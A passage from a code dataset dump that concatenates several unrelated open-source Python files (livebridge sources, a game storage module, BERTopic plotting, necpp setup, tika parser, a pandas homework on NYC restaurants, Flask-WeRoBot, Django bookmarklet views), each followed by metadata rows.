while get_total_length(profile) < self.min_profile_length:
line = " ".join(self.profile_markov.generate(random_=random_))
for item in [
("$fullname", surname),
("$known_as", surname),
("$surname", surname),
("$firstnames", firstnames),
("$team", country.name),
]:
placeholder, value = item
line = line.replace(placeholder, value)
profile.append(line)
player = players.Player(
country_id=country.country_id,
firstnames=firstnames,
surname=surname,
profile=profile,
fullname=firstnames + " " + surname,
known_as=""
)
return (player, seed)
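# Illustrative usage (names and values here are assumptions, not part of the
# original module): because generate() returns the seed it used, the exact same
# profile can be regenerated later by passing that seed back in.
#
#   generator = PlayerGenerator(sample_players, min_profile_length=200)
#   player, seed = generator.generate(country_code="AUS")
#   replay, _ = generator.generate(country_code="AUS", seed=seed)
#   assert replay.profile == player.profile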
def get_total_length(profile):
"""Return the sum of lengths of each string in this list.
>>> get_total_length(["This is a conversation", "Yes"])
25
"""
lengths = [len(line) for line in profile]
return sum(lengths)
| mit | 8,664,843,146,164,601,000 | 32.080808 | 78 | 0.584427 | false | 4.02829 | false | false | false |
dpa-newslab/livebridge | livebridge/base/sources.py | 1 | 4313 | # -*- coding: utf-8 -*-
#
# Copyright 2016 dpa-infocom GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from livebridge.components import get_db_client
logger = logging.getLogger(__name__)
class BaseSource(object):
"""Base class for sources."""
__module__ = "livebridge.base"
type = ""
mode = ""
def __init__(self, *, config={}, **kwargs):
"""Base constructor for sources.
:param config: Configuration passed from the control file.
"""
pass
@property
def _db(self):
"""Database client for accessing storage.
:returns: :class:`livebridge.storages.base.BaseStorage` """
if not hasattr(self, "_db_client") or getattr(self, "_db_client") is None:
self._db_client = get_db_client()
return self._db_client
async def filter_new_posts(self, source_id, post_ids):
"""Filters ist of post_id for new ones.
:param source_id: id of the source
:type string:
:param post_ids: list of post ids
:type list:
:returns: list of unknown post ids."""
new_ids = []
try:
db_client = self._db
posts_in_db = await db_client.get_known_posts(source_id, post_ids)
new_ids = [p for p in post_ids if p not in posts_in_db]
except Exception as exc:
logger.error("Error when filtering for new posts {} {}".format(source_id, post_ids))
logger.exception(exc)
return new_ids
async def get_last_updated(self, source_id):
"""Returns latest update-timestamp from storage for source.
:param source_id: id of the source (source_id, ticker_id, blog_id pp)
:type string:
:returns: :py:class:`datetime.datetime` object of latest update datetime in db."""
last_updated = await self._db.get_last_updated(source_id)
logger.info("LAST UPDATED: {} {}".format(last_updated, self))
return last_updated
class PollingSource(BaseSource):
"""Base class for sources which are getting polled. Any custom adapter source, which \
should get polled, has to be inherited from this base class."""
mode = "polling"
async def poll(self):
"""Method has to be implemented by the concrete inherited source class.
:func:`poll` gets called by the interval defined by environment var *POLLING_INTERVALL*.
The inheriting class has to implement the actual poll request for the source in this method.
:return: list of new posts"""
raise NotImplementedError("Method 'poll' not implemented.")
async def stop(self):
"""Method can be implemented by the concrete inherited source class.
By implementing this method, the source class is able to handle the shutdown event explicitly."""
pass
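# Minimal sketch of a concrete polling source (an illustration only, not part of
# livebridge itself): a subclass normally just implements ``poll`` and returns a
# list of new posts; an empty list means there is nothing new to bridge.
#
# class ExampleAPISource(PollingSource):
#
#     type = "example-api"
#
#     async def poll(self):
#         # fetch new posts from the upstream service here
#         return []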
class StreamingSource(BaseSource):
"""Base class for streaming sources. Any custom adapter source, which is using a websocket, SSE or\
any other stream as source has to be inherited from this base class."""
mode = "streaming"
async def listen(self, callback):
"""Method has to be implemented by the concrete inherited source class.
A websocket connection has to be opened and given *callback* method has to be
called with the new post as argument.
:param callback: Callback method which has to be called with list of new posts.
:return: True"""
raise NotImplementedError("Method 'listen' not implemented.")
async def stop(self):
"""Method has to be implemented by the concrete inherited source class.
By calling this method, the websocket-connection has to be stopped.
:return: True"""
raise NotImplementedError("Method 'stop' not implemented.")
| apache-2.0 | 8,024,353,077,062,878,000 | 35.243697 | 108 | 0.657083 | false | 4.334673 | false | false | false |
isharacomix/rules-of-war | code/core/storage.py | 1 | 2639 | # The storage module is a platform-independent way of saving and loading
# files to certain locations. This module is global and functional. It contains
# NO state information.
#
# There are two data stores. The local data stored in the user's home directory
# and the global data stored in /data/ in the game's runtime location. The data
# directory must be two sublevels above this file. Information should never
# be saved in data... only in home.
import os
GAME_DIR = ".rules-of-war"
# This reads the text from a file in the home directory. Each arg is a
# folder in the filename, and will be joined as appropriate. Returns None if
# the file does not exist.
def read(*args):
home = os.path.join(os.path.expanduser("~"),GAME_DIR)
target = os.path.join(home, *args)
if not os.path.exists(target):
return None
try:
f = open(target,"r")
s = f.read()
f.close()
return s
except:
return None
# This returns a list of filenames under the provided directory.
def list_files(*args):
home = os.path.join(os.path.expanduser("~"),GAME_DIR)
target = os.path.join(home, *args)
if not os.path.exists(target):
return []
return [ f for f in os.listdir(target)
if os.path.isfile(os.path.join(target,f)) ]
# This saves a file to the home directory, overwriting if appropriate.
# Returns False if something goes wrong.
def save(data, *args):
home = os.path.join(os.path.expanduser("~"),GAME_DIR)
targetdir = os.path.join(home, *(args[:-1]))
target = os.path.join(home, *args)
if not os.path.exists(targetdir):
os.makedirs(targetdir)
try:
f = open(target,"w")
f.write(data)
f.close()
return True
except:
return False
# This reads a file from the provided data directory.
def read_data(*args):
data = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"..","..","data")
target = os.path.join(data, *args)
if not os.path.exists(target):
return None
try:
f = open(target,"r")
s = f.read()
f.close()
return s
except:
return None
# This returns a list of filenames under the provided data directory. These
# files should be considered READ ONLY.
def list_datafiles(*args):
data = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"..","..","data")
target = os.path.join(data, *args)
if not os.path.exists(target):
return []
return [ f for f in os.listdir(target)
if os.path.isfile(os.path.join(target,f)) ]
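# Illustrative helper (not part of the original module; the file names are made
# up): shows how the writable home store and the read-only data store combine.
def _example_usage():
    save("name: Alice", "profiles", "alice.txt")   # writes ~/.rules-of-war/profiles/alice.txt
    profile = read("profiles", "alice.txt")        # reads it back (None if missing)
    shipped_maps = list_datafiles("maps")          # read-only files under the game's data/maps
    return profile, shipped_maps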
| gpl-3.0 | -2,016,188,181,290,425,600 | 31.9875 | 79 | 0.628268 | false | 3.600273 | false | false | false |
MaartenGr/BERTopic | bertopic/plotting/_topics_over_time.py | 1 | 3528 | import pandas as pd
from typing import List
import plotly.graph_objects as go
def visualize_topics_over_time(topic_model,
topics_over_time: pd.DataFrame,
top_n_topics: int = None,
topics: List[int] = None,
width: int = 1250,
height: int = 450) -> go.Figure:
""" Visualize topics over time
Arguments:
topic_model: A fitted BERTopic instance.
topics_over_time: The topics you would like to be visualized with the
corresponding topic representation
top_n_topics: To visualize the most frequent topics instead of all
topics: Select which topics you would like to be visualized
width: The width of the figure.
height: The height of the figure.
Returns:
A plotly.graph_objects.Figure including all traces
Usage:
To visualize the topics over time, simply run:
```python
topics_over_time = topic_model.topics_over_time(docs, topics, timestamps)
topic_model.visualize_topics_over_time(topics_over_time)
```
Or if you want to save the resulting figure:
```python
fig = topic_model.visualize_topics_over_time(topics_over_time)
fig.write_html("path/to/file.html")
```
<iframe src="../../tutorial/visualization/trump.html"
style="width:1000px; height: 680px; border: 0px;""></iframe>
"""
colors = ["#E69F00", "#56B4E9", "#009E73", "#F0E442", "#D55E00", "#0072B2", "#CC79A7"]
# Select topics
if topics:
selected_topics = topics
elif top_n_topics:
selected_topics = topic_model.get_topic_freq().head(top_n_topics + 1)[1:].Topic.values
else:
selected_topics = topic_model.get_topic_freq().Topic.values
# Prepare data
topic_names = {key: value[:40] + "..." if len(value) > 40 else value
for key, value in topic_model.topic_names.items()}
topics_over_time["Name"] = topics_over_time.Topic.map(topic_names)
data = topics_over_time.loc[topics_over_time.Topic.isin(selected_topics), :]
# Add traces
fig = go.Figure()
for index, topic in enumerate(data.Topic.unique()):
trace_data = data.loc[data.Topic == topic, :]
topic_name = trace_data.Name.values[0]
words = trace_data.Words.values
fig.add_trace(go.Scatter(x=trace_data.Timestamp, y=trace_data.Frequency,
mode='lines',
marker_color=colors[index % 7],
hoverinfo="text",
name=topic_name,
hovertext=[f'<b>Topic {topic}</b><br>Words: {word}' for word in words]))
# Styling of the visualization
fig.update_xaxes(showgrid=True)
fig.update_yaxes(showgrid=True)
fig.update_layout(
yaxis_title="Frequency",
title={
'text': "<b>Topics over Time",
'y': .95,
'x': 0.40,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(
size=22,
color="Black")
},
template="simple_white",
width=width,
height=height,
hoverlabel=dict(
bgcolor="white",
font_size=16,
font_family="Rockwell"
),
legend=dict(
title="<b>Global Topic Representation",
)
)
return fig
| mit | 3,429,931,196,606,199,000 | 34.28 | 105 | 0.553288 | false | 3.906977 | false | false | false |
tmolteno/python-necpp | necpp/setup.py | 1 | 2166 | #!/usr/bin/env python
"""
setup.py file for necpp Python module.
"""
from setuptools import setup, Extension
from glob import glob
import os
nec_sources = []
nec_sources.extend([fn for fn in glob('necpp_src/src/*.cpp')
if not os.path.basename(fn).endswith('_tb.cpp')
if not os.path.basename(fn).startswith('net_solve.cpp')
if not os.path.basename(fn).startswith('nec2cpp.cpp')
if not os.path.basename(fn).startswith('necDiff.cpp')])
nec_sources.extend(glob("necpp_wrap.c"))
nec_headers = []
nec_headers.extend(glob("necpp_src/src/*.h"))
nec_headers.extend(glob("necpp_src/config.h"))
# At the moment, the config.h file is needed, and this should be generated from the ./configure
# command in the parent directory. Use ./configure --without-lapack to avoid dependance on LAPACK
#
necpp_module = Extension('_necpp',
sources=nec_sources,
include_dirs=['necpp_src/src/', 'necpp_src/'],
depends=nec_headers,
define_macros=[('BUILD_PYTHON', '1')]
)
with open('README.md') as f:
readme = f.read()
setup (name = 'necpp',
version = '1.7.3.5',
author = "Tim Molteno",
author_email = "[email protected]",
url = "http://github.com/tmolteno/necpp",
keywords = "nec2 nec2++ antenna electromagnetism radio",
description = "Python Antenna Simulation Module (nec2++) C-style interface",
long_description=readme,
long_description_content_type="text/markdown",
include_package_data=True,
data_files=[('examples', ['necpp_src/example/test.py'])],
ext_modules = [necpp_module],
py_modules = ["necpp"],
license='GPLv2',
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Scientific/Engineering",
"Topic :: Communications :: Ham Radio",
"License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
"Intended Audience :: Science/Research"]
)
| gpl-2.0 | -8,857,182,121,933,700,000 | 33.380952 | 97 | 0.656971 | false | 3.384375 | false | false | false |
chrismattmann/tika-python | tika/parser.py | 1 | 4869 | #!/usr/bin/env python
# encoding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .tika import parse1, callServer, ServerEndpoint
import os
import json
def from_file(filename, serverEndpoint=ServerEndpoint, service='all', xmlContent=False, headers=None, config_path=None, requestOptions={}):
'''
Parses a file for metadata and content
:param filename: path to file which needs to be parsed or binary file using open(path,'rb')
:param serverEndpoint: Server endpoint url
:param service: service requested from the tika server
Default is 'all', which results in recursive text content+metadata.
'meta' returns only metadata
'text' returns only content
:param xmlContent: Whether or not XML content be requested.
Default is 'False', which results in text content.
:param headers: Request headers to be sent to the tika reset server, should
be a dictionary. This is optional
:return: dictionary having 'metadata' and 'content' keys.
'content' has a str value and metadata has a dict type value.
'''
if not xmlContent:
output = parse1(service, filename, serverEndpoint, headers=headers, config_path=config_path, requestOptions=requestOptions)
else:
output = parse1(service, filename, serverEndpoint, services={'meta': '/meta', 'text': '/tika', 'all': '/rmeta/xml'},
headers=headers, config_path=config_path, requestOptions=requestOptions)
return _parse(output, service)
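# Illustrative call (assumes a Tika server is reachable at the default endpoint and
# that 'report.pdf' exists; both are assumptions, not part of this module):
#
#   parsed = from_file('report.pdf', service='all')
#   print(parsed['metadata'])
#   print(parsed['content'])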
def from_buffer(string, serverEndpoint=ServerEndpoint, xmlContent=False, headers=None, config_path=None, requestOptions={}):
'''
Parses the content from buffer
:param string: Buffer value
:param serverEndpoint: Server endpoint. This is optional
:param xmlContent: Whether or not XML content be requested.
Default is 'False', which results in text content.
:param headers: Request headers to be sent to the tika reset server, should
be a dictionary. This is optional
    :return: dictionary having 'metadata' and 'content' keys.
'''
headers = headers or {}
headers.update({'Accept': 'application/json'})
if not xmlContent:
status, response = callServer('put', serverEndpoint, '/rmeta/text', string, headers, False, config_path=config_path, requestOptions=requestOptions)
else:
status, response = callServer('put', serverEndpoint, '/rmeta/xml', string, headers, False, config_path=config_path, requestOptions=requestOptions)
return _parse((status,response))
def _parse(output, service='all'):
'''
Parses response from Tika REST API server
:param output: output from Tika Server
:param service: service requested from the tika server
Default is 'all', which results in recursive text content+metadata.
'meta' returns only metadata
'text' returns only content
:return: a dictionary having 'metadata' and 'content' values
'''
parsed={'metadata': None, 'content': None}
if not output:
return parsed
parsed["status"] = output[0]
if output[1] == None or output[1] == "":
return parsed
if service == "text":
parsed["content"] = output[1]
return parsed
realJson = json.loads(output[1])
parsed["metadata"] = {}
if service == "meta":
for key in realJson:
parsed["metadata"][key] = realJson[key]
return parsed
content = ""
for js in realJson:
if "X-TIKA:content" in js:
content += js["X-TIKA:content"]
if content == "":
content = None
parsed["content"] = content
for js in realJson:
for n in js:
if n != "X-TIKA:content":
if n in parsed["metadata"]:
if not isinstance(parsed["metadata"][n], list):
parsed["metadata"][n] = [parsed["metadata"][n]]
parsed["metadata"][n].append(js[n])
else:
parsed["metadata"][n] = js[n]
return parsed
| apache-2.0 | 3,369,326,313,456,085,500 | 40.262712 | 155 | 0.648388 | false | 4.402351 | true | false | false |
wenduowang/git_home | python/MSBA/intro/HW2/HW2_wenduowang.py | 1 | 12556 |
# coding: utf-8
# In[1]:
from pandas import Series, DataFrame
import pandas as pd
import warnings
warnings.filterwarnings('ignore')
get_ipython().magic(u'pylab inline')
# # NYC Restaurants
# ### Read in data from csv, and check column names to keep in mind.
# In[2]:
restaurants = pd.read_csv("NYC_Restaurants.csv", dtype=unicode)
for index, item in enumerate(restaurants.columns.values):
print index, item
# ## Question 1: Create a unique name for each restaurant
# 1. Select `DBA`, `BUILDING`, `STREET` and `ZIPCODE` columns as a dataframe
# 2. Apply `apply()` function on the selected dataframe, which takes in the series of the dataframe.
# + inside the `apply()` function, use placeholders to indicate that 4 series will be taken at the same time.
# + it is possible to select each column and concatenate them together, though looks not DRY.
# In[3]:
#use .apply() method to combine the 4 columns to get the unique restaurant name
restaurants["RESTAURANT"] = restaurants[["DBA", "BUILDING", "STREET", "ZIPCODE"]]. apply(lambda x: "{} {} {} {}".format(x[0], x[1], x[2], x[3]), axis=1)
#incase that the RESTAURANT names contain spaces or symbols, strip off them
restaurants["RESTAURANT"] = restaurants["RESTAURANT"].map(lambda y: y.strip())
print restaurants["RESTAURANT"][:10]
# ## Question 2: How many restaurants are included in the data?
# Since each `RESTAURANT` appears appears only once in `value_count()` series, therefore applying `len()` will return the number of restaurants in the whole dataset.
# In[4]:
print "There are", len(restaurants.drop_duplicates(subset="RESTAURANT")["RESTAURANT"].value_counts()), "restaurants in the data."
# ## Question 3: How many chains are there?
# "Chains" are brands having at least 2 different `RESTAURANT`. After `drop_duplicates(subset="RESTAURANT")`, extracting`value_count()` on `DBA` will give how many `RESTAURANT` each `DBA` has. Converting each value into logical with evaluation `value_count()>=2` and then summing up the how series will give the number of `True` records, which is the number of chains.
# In[5]:
num_chain = sum(restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()>=2)
print "There are", num_chain, "chain restaurants."
# ## Question 4: Plot a bar graph of the top 20 most popular chains.
# "Popularity" is here understood as number of `RESAURANT` of each `DBA`.
# 1. Extract the chain `DBA`
# 2. Define a helper function `chain` to identify if a given `DBA` is a chain.
# 3. Use the helper function to make a mask to select the chain `DBA`.
# 4. Apply the mask to the whole dataframe, and drop duplicate `RESTAURANT`, the `value_counts()` will give the number of locations of each `DBA`
# In[6]:
chains = restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()[: num_chain].index.values
def chain(restaurant):
return (restaurant in chains)
mask = restaurants["DBA"].map(chain)
restaurants[mask].drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()[:20].plot(kind="bar")
# ## Question 5: What fraction of all restaurants are chains?
# To calculate the faction of chains among all restaurants, we use an inline mask on `DBA`(`True` if is chain). Summing up `True` values gives the number of chains. It is divided by the total number of unique `RESTAURANT` to get the fraction.
# In[7]:
print "The percentage of chain restaurants is",
print "{:.2%}".format(sum(restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()>=2)/float(len(restaurants["RESTAURANT"].value_counts())))
# ## Question 6: Plot the number of non-chain restaurants in each boro.
# 1. In case "missing" is spelt differently, a helper function `lower_case` is defined to convert the string into lower case.
# 2. Use the `chain` helper function to make a mask selecting chains. Negative of this mask will return non-chains.
# 3. Use the `lower_case` function to select missing `BORO`.
# 4. Use the "negative" mask to select non-chains and remove duplicate `RESTAURANT`, and then remove missing `BORO`, `value_counts()` gives number of non-chains in each borough.
# In[8]:
def lower_case(X):
return X.lower()
mask_1 = restaurants["DBA"].map(chain)
mask_2 = restaurants["BORO"].map(lower_case) != "missing"
restaurants[-mask_1].drop_duplicates(subset="RESTAURANT")[mask_2]["BORO"].value_counts().sort_values(ascending=False).plot(kind="bar")
# ## Question 7: Plot the fraction of non-chain restaurants in each boro.
# The goal is to calculate the ratio of $\frac{N_{non-chain}}{N_{total}}$ within each borough.
#
# This fraction can be done between two series-`value_counts()` of non-chains of `BORO` (not missing) and `value_counts()` of all unique `RESTAURANT` of `BORO`.
#
# Depending on which borough has the highest ratio, a message will pop out to compare if it is the same with the borough with the most non-chains.
# In[9]:
series_tmp_1 = restaurants[mask_2].drop_duplicates(subset="RESTAURANT")["BORO"].value_counts()
series_tmp_2 = restaurants[-mask_1][mask_2].drop_duplicates(subset="RESTAURANT")["BORO"].value_counts()
series_tmp_ratio = series_tmp_2/series_tmp_1
series_tmp_ratio.sort_values(ascending=False).plot(kind="bar")
print "The highest non-chain/total ratio is:", "{:0.2%} ({})".format(series_tmp_ratio.sort_values(ascending=False)[0], series_tmp_ratio.sort_values(ascending=False).index.values[0])
if series_tmp_ratio.sort_values(ascending=False).index.values[0] !=restaurants[-mask_1].drop_duplicates(subset="RESTAURANT")[mask_2]["BORO"].value_counts().sort_values(ascending=False).index.values[0]:
print "It is not the same borough."
else:
print "It is the same borough."
# ## Question 8: Plot the popularity of cuisines.
# Drop duplicate `RESTAURANT` and plot on the top 20 of sorted `value_counts()` of `CUISINE DESCRIPTION.`
# In[10]:
restaurants.drop_duplicates(subset="RESTAURANT")["CUISINE DESCRIPTION"].value_counts() .sort_values(ascending=False)[:20].plot(kind="bar")
# ## Question 9: Plot the cuisines among restaurants which never got cited for violations.
# Here we used a mask to sift out the restaurants whose `VIOLATION CODE` is missing.
# In[18]:
non_clean_restaurants = restaurants[-restaurants["VIOLATION CODE"].isnull()]["RESTAURANT"].value_counts().index.values
def is_clean(restaurant, blacklist=non_clean_restaurants):
return restaurant not in blacklist
mask_clean = restaurants["RESTAURANT"].map(is_clean)
restaurants[mask_clean]["CUISINE DESCRIPTION"].value_counts().sort_values(ascending=False)[:20].plot(kind="bar")
# ## Question 10: What cuisines tend to be the “cleanest”?
# 1. Make a series of all cuisines with 20 or more serving records in non-duplicate restaurants.
# 2. Define a helper function to determine if a given cuisine is in the series above.
# 3. Make a mask for the most served cuisines.
# 4. Apply that mask and the "non violation" mask in Q9 to produce a `value_counts()` series, containing the non-violation records for those cuisines.
# 5. Apply the newly defined mask to the whole DataFrame and produce another `value_counts()` containing how many inspections were done for the most served cuisines.
# 6. Divide the two series and get a new series of the format $cuisine:\ \frac{N_{non-violation}}{N_{total\ inspection}}$.
# 7. Plot the first 10 elements.
# In[12]:
top_cuisine_series = restaurants.drop_duplicates(subset=["RESTAURANT","CUISINE DESCRIPTION"])["CUISINE DESCRIPTION"].value_counts()
def is_top_cuisine(cuisine):
return top_cuisine_series[cuisine]>=20
mask_3 = restaurants["VIOLATION CODE"].isnull()
mask_4 = restaurants["CUISINE DESCRIPTION"].map(is_top_cuisine)
series_tmp_3 = restaurants[mask_4][mask_3]["CUISINE DESCRIPTION"].value_counts()
series_tmp_4 = restaurants[mask_4]["CUISINE DESCRIPTION"].value_counts()
(series_tmp_3/series_tmp_4).sort_values(ascending=False)[:10].plot(kind="bar")
# ## Question 11: What are the most common violations in each borough?
# 1. Use `crosstab` to create a dataframe with `VIOLATION DESCRIPTION` as index, and `BORO` (without "Missing" boroughs) as columns. `dropna` is set `True` so `NaN` will not be recorded.
# 2. Every cell in the `crosstab` is the number of occurences of a violation in a certain borough. `idxmax()` method is applied to automatically retrieve the max occurence for each `BORO`.
# In[13]:
violation_boro_tab = pd.crosstab(
index=restaurants["VIOLATION DESCRIPTION"],
columns=restaurants[restaurants["BORO"]!="Missing"]["BORO"],
dropna=True
)
print "The most common violation in each borough is summarised below:"
violation_boro_tab.idxmax()
# ## Question 12: What are the most common violations per borough, after normalizing for the relative abundance of each violation?
# 1. Use `apply()` function to apply `lambda x: x.map(float)/violation_frequency_series, axis=0` on each column of the above `crosstab`. The resulting series gives _normalized_ violation frequency.
# + `float()` ensures the division returns fraction.
# + The denominator is a series of the `value_counts()` of all `VIOLATION DESCRIPTION`.
# In[14]:
violation_frequency_series = restaurants["VIOLATION DESCRIPTION"].value_counts()
violation_boro_norm_tab = violation_boro_tab.apply(lambda x: x.map(float)/violation_frequency_series, axis=0)
print "After normalization, the most common violation in each borough is summarised below:"
violation_boro_norm_tab.idxmax()
# ## Question 13: How many phone area codes correspond to a single zipcode?
# 1. Create a new column `AREA` to store the first 3 digits of `PHONE`, which is the area code.
# 2. Drop duplicate rows with the same combination of `AREA` and `ZIPCODE`.
# 3. By `value_counts()==1` each `AREA` with a single `ZIPCODE` will return `True`.
# 4. Sum up `True` values to return the total number of such area codes.
# In[15]:
restaurants["AREA"] = restaurants["PHONE"].map(lambda x: x[:3])
print "There are",
print sum(restaurants.drop_duplicates(subset=["AREA", "ZIPCODE"])["AREA"].value_counts() == 1),
print "area codes corresponding to only 1 zipcode"
# ## Question 14: Find common misspellings of street names
# 1. `map` `str.split()` function on `STREET` to breakdown the string into a list of words, and take the last word as `STREET TYPE`.
# 2. Take the remaining words and join them together as `STREET BASE`.
# 3. Concatenate `STREET BASE` and `STREET TYPE` together as `STREET BASE & ZIP`, spaced with empty space.
# 4. Create a new dataframe by `concat` the above 3 series. `axis=1` meaning concatenating horizontally.
# 5. Remove duplicate records from the new dataframe, where `STREET BASE` is not empty.
# 6. Merge the new dataframe with itself to get cross-matched `STREET TYPE`.
# 7. Only keep rows where the two `STREET TYPE` are different.
# 8. Make another `crosstab` on the merged dataframe with one `STREET TYPE` as index and the other as columns.
# 9. In the new `crosstab`, the occurences of alternative `STREET TYPE` are recorded in cells, whose max occurence can be obtained with `idxmax`.
# In[16]:
restaurants["STREET TYPE"] = restaurants["STREET"].map(lambda s: s.split()[-1])
restaurants["STREET BASE"] = restaurants["STREET"].map(lambda s: " ".join(s.split()[:-1]))
restaurants["STREET BASE & ZIP"] = restaurants["STREET BASE"].map(lambda s: s+" ") + restaurants["ZIPCODE"]
new_dataframe = pd.concat(
[restaurants["STREET BASE"], restaurants["STREET TYPE"], restaurants["STREET BASE & ZIP"]],
axis=1
)
new_dataframe = new_dataframe[new_dataframe["STREET BASE"].map(lambda s: len(s)>0)].drop_duplicates()
merged_new_dataframe = pd.merge(
new_dataframe,
new_dataframe,
left_on="STREET BASE & ZIP",
right_on="STREET BASE & ZIP",
suffixes=[" 1", " 2"]
)
merged_new_dataframe = merged_new_dataframe[merged_new_dataframe["STREET TYPE 1"] != merged_new_dataframe["STREET TYPE 2"]]
street_name = pd.crosstab(
index=merged_new_dataframe["STREET TYPE 1"],
columns=merged_new_dataframe["STREET TYPE 2"],
dropna=True
)
print "The most common alias for each of the following street type is listed"
street_name.idxmax()[
["AVE", "ST", "RD", "PL", "BOULEARD", "BOULEVARD"]
]
| gpl-3.0 | -8,672,267,729,537,924,000 | 47.651163 | 368 | 0.703155 | false | 3.277285 | false | false | false |
whtsky/Flask-WeRoBot | flask_werobot.py | 1 | 3402 | #coding=utf-8
"""
Flask-WeRoBot
---------------
Adds WeRoBot support to Flask.
:copyright: (c) 2013 by whtsky.
:license: BSD, see LICENSE for more details.
Links
`````
* `documentation <https://flask-werobot.readthedocs.org/>`_
"""
__version__ = '0.1.2'
from werobot.robot import BaseRoBot
from flask import Flask
class WeRoBot(BaseRoBot):
"""
    Adds WeRoBot support to your Flask application.
    You can add support by passing a Flask app when instantiating WeRoBot: ::
app = Flask(__name__)
robot = WeRoBot(app)
    Alternatively, instantiate a WeRoBot first and then add support to the app via ``init_app`` ::
robot = WeRoBot()
def create_app():
app = Flask(__name__)
robot.init_app(app)
return app
"""
def __init__(self, app=None, endpoint='werobot', rule=None, *args, **kwargs):
super(WeRoBot, self).__init__(*args, **kwargs)
if app is not None:
self.init_app(app, endpoint=endpoint, rule=rule)
else:
self.app = None
def init_app(self, app, endpoint='werobot', rule=None):
"""
        Adds WeRoBot support to an application.
        If you passed a Flask app when instantiating the ``WeRoBot`` class,
        this method is called automatically; otherwise you need to call
        ``init_app`` yourself to add support to the application.
        The same robot can be reused with several applications by calling
        ``init_app`` multiple times, each time with a different Flask app.
        :param app: a standard Flask app.
        :param endpoint: the endpoint used by WeRoBot. Defaults to ``werobot``.
            You can obtain the URL WeRoBot is served at via url_for(endpoint).
            If you want to bind several WeRoBot robots inside the same
            application, use a different endpoint for each of them.
        :param rule:
            The URL rule the robot is bound to. Defaults to ``WEROBOT_ROLE``
            in the Flask app config.
"""
assert isinstance(app, Flask)
from werobot.utils import check_token
from werobot.parser import parse_user_msg
from werobot.reply import create_reply
self.app = app
config = app.config
token = self.token
if token is None:
token = config.setdefault('WEROBOT_TOKEN', 'none')
if not check_token(token):
            raise AttributeError('%s is not a valid WeChat Token.' % token)
if rule is None:
rule = config.setdefault('WEROBOT_ROLE', '/wechat')
self.token = token
from flask import request, make_response
def handler():
if not self.check_signature(
request.args.get('timestamp', ''),
request.args.get('nonce', ''),
request.args.get('signature', '')
):
return 'Invalid Request.'
if request.method == 'GET':
return request.args['echostr']
body = request.data
message = parse_user_msg(body)
reply = self.get_reply(message)
if not reply:
return ''
response = make_response(create_reply(reply, message=message))
response.headers['content_type'] = 'application/xml'
return response
app.add_url_rule(rule, endpoint=endpoint,
view_func=handler, methods=['GET', 'POST'])
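# Illustrative wiring (the token value is an assumption, not part of this module):
# the token and rule can also be supplied through the Flask config instead of the
# constructor, as read in init_app() above.
#
#   app = Flask(__name__)
#   app.config['WEROBOT_TOKEN'] = 'my-secret-token'
#   robot = WeRoBot()
#   robot.init_app(app, endpoint='werobot', rule='/wechat')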
| bsd-3-clause | 2,627,483,782,171,116,500 | 28.490196 | 81 | 0.560838 | false | 2.966469 | false | false | false |
crankycoder/oabutton-py | oabutton/oabutton/apps/bookmarklet/views.py | 1 | 2510 | from django.http import HttpResponse, HttpResponseServerError
from django.shortcuts import render
from django.core import serializers
from models import Event
try:
from simplejson import dumps
except:
from json import dumps
# TODO: we should really break up the view URLs here to separate the
# OAButton facing website from the bookmarklet URLs.
def homepage(req):
return render(req, 'bookmarklet/site/index.html')
def about(req):
return render(req, 'bookmarklet/site/about.html')
def show_stories(req):
# we only grab the 50 latest stories
# the original node code grabbed all stories which will kill your
# database
latest_stories = Event.objects.all().order_by('-pub_date')[:50]
count = Event.objects.count()
context = {'title': 'Stories', 'events': latest_stories, 'count': count}
return render(req, 'bookmarklet/site/stories.html', context)
def show_map(req):
    # TODO: we need to make this smarter. Coalescing the lat/long
# data on a nightly basis and folding that down into clustered
# points would mean we throw less data down to the browser
count = Event.objects.count()
json_data = serializers.serialize("json", Event.objects.all())
context = {'title': 'Map', 'events': json_data, 'count': count }
return render(req, 'bookmarklet/site/map.html', context)
def get_json(req):
# Dump all data as JSON. This seems like a terrible idea when the
# dataset gets large.
json_data = serializers.serialize("json", Event.objects.all())
return HttpResponse(json_data, content_type="application/json")
def add(req):
# Display an entry page
# How does the DOI get in automatically? This seems really wrong.
# At the least, we need a test here to illustrate why this should
# work at all.
return render('sidebar/index.html', context={'url': req.query.url, 'doi': req.query.doi})
def add_post(req):
# Handle POST
event = Event()
# Where does the coords come from? This seems like it's using the
# HTML5 locationAPI. Need to dig around a bit
coords = req['coords'].split(',')
event.coords_lat = float(coords[0])
event.coords_lng = float(coords[1])
try:
event.save()
except Exception, e:
return HttpResponseServerError(e)
scholar_url = ''
if req.body['doi']:
scholar_url = 'http://scholar.google.com/scholar?cluster=' + 'http://dx.doi.org/' + req['doi']
return render('sidebar/success.html', {'scholar_url': scholar_url})
| mit | -3,371,336,796,552,659,500 | 34.352113 | 102 | 0.688048 | false | 3.616715 | false | false | false |
